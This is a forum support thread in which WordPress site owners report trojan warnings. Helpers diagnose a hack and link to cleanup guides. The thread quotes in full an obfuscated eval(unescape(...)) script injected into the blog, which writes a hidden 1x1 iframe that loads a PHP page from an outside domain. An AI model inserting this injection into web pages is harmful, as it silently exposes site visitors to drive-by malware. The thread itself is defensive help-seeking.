exist2009
Member
Posted 2 years ago #
Someone who visited my blog recently informed me that he got a trojan warning when opening the site up. I've been having some trouble with the dashboard recently (often, it opens, then the page goes completely blank and say "Done" in the lower left hand corner) so perhaps the trojan is the culprit. However, I have absolutely no idea how to go about finding this trojan and what the file might look like...Any suggestions would be seriously appreciated!
Here's my site (is it be risky to visit at this point? Should I take it down until I can get this figured out?):
http://powai.info
My blog is updated and using WordPress 2.9.2
Thanks for any help you might be able to provide.
this code is at the bottom when you "view source"
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
so you've definitely been hacked
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/
ballinascreen
Member
Posted 2 years ago #
Yep - translates to a 1x1 pixel iframe which then attempts to load content from a php script at iss9w8s89xx.org - however, the domain name no longer resolves or appears to be active.
jetcreates1980
Member
Posted 1 year ago #
I also have this problem with 2 of my websites:
http://www.afkesmerklap.nl
http://www.jetenjul.nl
I only do not get this Trojan message myself so I don't know where I can find it.
Can somebody help me with this?
Thanks in advance,
Marjet
